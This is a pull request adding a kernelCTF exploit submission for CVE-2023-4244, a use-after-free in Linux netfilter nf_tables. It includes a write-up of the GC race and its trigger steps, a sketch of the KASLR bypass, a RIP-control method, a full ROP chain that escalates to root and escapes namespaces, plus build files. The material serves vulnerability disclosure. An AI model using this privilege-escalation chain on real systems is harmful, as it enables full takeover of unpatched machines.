Add kernelCTF CVE-2023-4244_mitigation #161

270 changes: 270 additions & 0 deletions pocs/linux/kernelctf/CVE-2023-4244_mitigation/docs/exploit.md
@@ -0,0 +1,270 @@
# Overview

The vulnerability is caused by a race condition between the nf_tables netlink control plane and set element garbage collection (GC).

```c
static int nft_delset(const struct nft_ctx *ctx, struct nft_set *set)
{
	int err;

	err = nft_trans_set_add(ctx, NFT_MSG_DELSET, set);
	if (err < 0)
		return err;

	if (set->flags & (NFT_SET_MAP | NFT_SET_OBJECT))
		nft_map_deactivate(ctx, set); // [1]

	nft_deactivate_next(ctx->net, set);
	nft_use_dec(&ctx->table->use);

	return err;
}
```

Deleting an `nft_set` deactivates its set elements in `nft_delset`, through the call to `nft_map_deactivate` [1].

```c
static void nft_rbtree_gc(struct work_struct *work)
{
	struct nft_rbtree_elem *rbe, *rbe_end = NULL, *rbe_prev = NULL;
	struct nft_set_gc_batch *gcb = NULL;
	struct nft_rbtree *priv;
	struct rb_node *node;
	struct nft_set *set;
	struct net *net;
	u8 genmask;

	priv = container_of(work, struct nft_rbtree, gc_work.work);
	set = nft_set_container_of(priv);
	net = read_pnet(&set->net);
	genmask = nft_genmask_cur(net);

	write_lock_bh(&priv->lock);
	write_seqcount_begin(&priv->count);
	for (node = rb_first(&priv->root); node != NULL; node = rb_next(node)) {
		rbe = rb_entry(node, struct nft_rbtree_elem, node);

		if (!nft_set_elem_active(&rbe->ext, genmask))
			continue;

		/* elements are reversed in the rbtree for historical reasons,
		 * from highest to lowest value, that is why end element is
		 * always visited before the start element.
		 */
		if (nft_rbtree_interval_end(rbe)) {
			rbe_end = rbe;
			continue;
		}
		if (!nft_set_elem_expired(&rbe->ext))
			continue;

		if (nft_set_elem_mark_busy(&rbe->ext)) {
			rbe_end = NULL;
			continue;
		}

		if (rbe_prev) {
			rb_erase(&rbe_prev->node, &priv->root);
			rbe_prev = NULL;
		}
		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
		if (!gcb)
			break;

		atomic_dec(&set->nelems);
		nft_set_gc_batch_add(gcb, rbe); // [2]
		rbe_prev = rbe;

		if (rbe_end) {
			atomic_dec(&set->nelems);
			nft_set_gc_batch_add(gcb, rbe_end);
			rb_erase(&rbe_end->node, &priv->root);
			rbe_end = NULL;
		}
		node = rb_next(node);
		if (!node)
			break;
	}
	if (rbe_prev)
		rb_erase(&rbe_prev->node, &priv->root);
	write_seqcount_end(&priv->count);
	write_unlock_bh(&priv->lock);

	rbe = nft_set_catchall_gc(set);
	if (rbe) {
		gcb = nft_set_gc_batch_check(set, gcb, GFP_ATOMIC);
		if (gcb)
			nft_set_gc_batch_add(gcb, rbe);
	}
	nft_set_gc_batch_complete(gcb); // [3]

	queue_delayed_work(system_power_efficient_wq, &priv->gc_work,
			   nft_set_gc_interval(set));
}
```

If the set's GC function, `nft_rbtree_gc`, runs at the same time, it adds the expired elements to the GC batch [2] and then calls `nft_set_gc_batch_complete` to release them [3]. As a result, an element that was already deactivated by `nft_delset` is deactivated a second time by the GC, which leads to the vulnerability.

We can trigger a use-after-free (UAF) from this vulnerability as follows. First, create a victim set and a victim chain, then create an immediate expr that points to the victim chain; this expr will later hold the dangling pointer. At this point, the victim chain's reference count (`nft_chain->use`) is 1. Then, add to the victim set an element that points to the victim chain and is configured with a short timeout. The reference count of the victim chain is now 2. Next, delete the set to trigger the vulnerability. When the vulnerability is triggered, the victim chain's reference count is decremented twice, down to zero. Since the reference count of the victim chain is zero, the chain can be freed. As a result, the immediate expr is left holding a dangling pointer to the victim chain.

# KASLR Bypass and Information Leak

We used a timing side-channel attack to leak the kernel base, and placed a fake ops structure in the non-randomized CPU entry area (CVE-2023-0597), so no heap address leak was needed.

# RIP Control

```c
struct nft_chain {
	struct nft_rule_blob __rcu	*blob_gen_0;
	struct nft_rule_blob __rcu	*blob_gen_1;
	struct list_head		rules;
	struct list_head		list;
	struct rhlist_head		rhlhead;
	struct nft_table		*table;
	u64				handle;
	u32				use;
	u8				flags:5,
					bound:1,
					genmask:2;
	char				*name;
	u16				udlen;
	u8				*udata;

	/* Only used during control plane commit phase: */
	struct nft_rule_blob		*blob_next;
};
```

When the vulnerability is triggered, `chain->blob_gen_0` of the freed chain can still be accessed via the immediate expr. We leave the chain freed and spray an object over it so that `blob_gen_0` points to a fake blob.

```c
unsigned int
nft_do_chain(struct nft_pktinfo *pkt, void *priv)
{
	...
do_chain:
	if (genbit)
		blob = rcu_dereference(chain->blob_gen_1);
	else
		blob = rcu_dereference(chain->blob_gen_0);

	rule = (struct nft_rule_dp *)blob->data;
	last_rule = (void *)blob->data + blob->size;
next_rule:
	regs.verdict.code = NFT_CONTINUE;
	for (; rule < last_rule; rule = nft_rule_next(rule)) {
		nft_rule_dp_for_each_expr(expr, last, rule) {
			if (expr->ops == &nft_cmp_fast_ops)
				nft_cmp_fast_eval(expr, &regs);
			else if (expr->ops == &nft_cmp16_fast_ops)
				nft_cmp16_fast_eval(expr, &regs);
			else if (expr->ops == &nft_bitwise_fast_ops)
				nft_bitwise_fast_eval(expr, &regs);
			else if (expr->ops != &nft_payload_fast_ops ||
				 !nft_payload_fast_eval(expr, &regs, pkt))
				expr_call_ops_eval(expr, &regs, pkt);

			if (regs.verdict.code != NFT_CONTINUE)
				break;
		}
```

```c
static void expr_call_ops_eval(const struct nft_expr *expr,
			       struct nft_regs *regs,
			       struct nft_pktinfo *pkt)
{
#ifdef CONFIG_RETPOLINE
	unsigned long e = (unsigned long)expr->ops->eval;
#define X(e, fun) \
	do { if ((e) == (unsigned long)(fun)) \
		return fun(expr, regs, pkt); } while (0)

	X(e, nft_payload_eval);
	X(e, nft_cmp_eval);
	X(e, nft_counter_eval);
	X(e, nft_meta_get_eval);
	X(e, nft_lookup_eval);
	X(e, nft_range_eval);
	X(e, nft_immediate_eval);
	X(e, nft_byteorder_eval);
	X(e, nft_dynset_eval);
	X(e, nft_rt_get_eval);
	X(e, nft_bitwise_eval);
#undef X
#endif /* CONFIG_RETPOLINE */
	expr->ops->eval(expr, regs, pkt);
}
```

`chain->blob_gen_0` is dereferenced in `nft_do_chain`, and `expr_call_ops_eval` calls `expr->ops->eval` to evaluate each expression. We point the ops of the fake expr at the CPU entry area to control RIP. We allocate the fake blob object with a size larger than 0x2000 so that it is served by the page allocator.

# Post-RIP

The ROP payload is stored in `chain->blob_gen_0`, which is allocated by the page allocator.

When `eval()` is called, `RBX` points to `chain->blob_gen_0+0x10`, which is the beginning of the `nft_expr` structure.

```c
void rop_chain(uint64_t* data){
int i = 0;

// nft_rule_blob.size > 0
data[i++] = 0x100;
// nft_rule_blob.dlen > 0
data[i++] = 0x100;

// fake ops addr
data[i++] = PAYLOAD_LOCATION(1) + offsetof(struct cpu_entry_area_payload, nft_expr_eval);

// current = find_task_by_vpid(getpid())
data[i++] = kbase + POP_RDI_RET;
data[i++] = getpid();
data[i++] = kbase + FIND_TASK_BY_VPID;

// current += offsetof(struct task_struct, rcu_read_lock_nesting)
data[i++] = kbase + POP_RSI_RET;
data[i++] = RCU_READ_LOCK_NESTING_OFF;
data[i++] = kbase + ADD_RAX_RSI_RET;

// current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
data[i++] = kbase + POP_RCX_RET;
data[i++] = 0;
data[i++] = kbase + MOV_RAX_RCX_RET;

// Bypass "schedule while atomic": set oops_in_progress = 1
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + OOPS_IN_PROGRESS;
data[i++] = kbase + MOV_RSI_RDI_RET;

// commit_creds(&init_cred)
data[i++] = kbase + POP_RDI_RET;
data[i++] = kbase + INIT_CRED;
data[i++] = kbase + COMMIT_CREDS;

// find_task_by_vpid(1)
data[i++] = kbase + POP_RDI_RET;
data[i++] = 1;
data[i++] = kbase + FIND_TASK_BY_VPID;

data[i++] = kbase + POP_RSI_RET;
data[i++] = 0;

// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
data[i++] = kbase + MOV_RDI_RAX_RET;
data[i++] = kbase + POP_RSI_RET;
data[i++] = kbase + INIT_NSPROXY;
data[i++] = kbase + SWITCH_TASK_NAMESPACES;

data[i++] = kbase + SWAPGS_RESTORE_REGS_AND_RETURN_TO_USERMODE;
data[i++] = 0;
data[i++] = 0;
data[i++] = _user_rip;
data[i++] = _user_cs;
data[i++] = _user_rflags;
data[i++] = _user_sp;
data[i++] = _user_ss;
}
```
@@ -0,0 +1,12 @@
- Requirements:
- Capabilities: CAP_NET_ADMIN
- Kernel configuration: CONFIG_NETFILTER, CONFIG_NF_TABLES
- User namespaces required: Yes
- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfed7e1b1f8e (netfilter: nf_tables: add set garbage collection helpers)
- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26 (netfilter: nf_tables: GC transaction API to avoid race with control plane)
- Affected Version: v6.4 - v6.5-rc5
- Affected Component: net/netfilter
- Cause: Use-After-Free
- Syscall to disable: disallow unprivileged user namespaces
- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-4244
- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. Due to a race condition between nf_tables netlink control plane transaction and nft_set element garbage collection, it is possible to underflow the reference counter causing a use-after-free vulnerability. We recommend upgrading past commit 3e91b0ebd994635df2346353322ac51ce84ce6d8.
@@ -0,0 +1,35 @@
LIBMNL_DIR = $(realpath ./)/libmnl_build
LIBNFTNL_DIR = $(realpath ./)/libnftnl_build

exploit:
	gcc -o exploit exploit.c -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include -static -s

prerequisites: libmnl-build libnftnl-build

libmnl-build : libmnl-download
	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make
	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install

libnftnl-build : libmnl-build libnftnl-download
	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make
	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install

libmnl-download :
	mkdir $(LIBMNL_DIR)
	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2

libnftnl-download :
	mkdir $(LIBNFTNL_DIR)
	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz

run:
	./exploit

clean:
	rm -rf $(LIBMNL_DIR)
	rm -rf $(LIBNFTNL_DIR)
	rm -f exploit
Binary file not shown.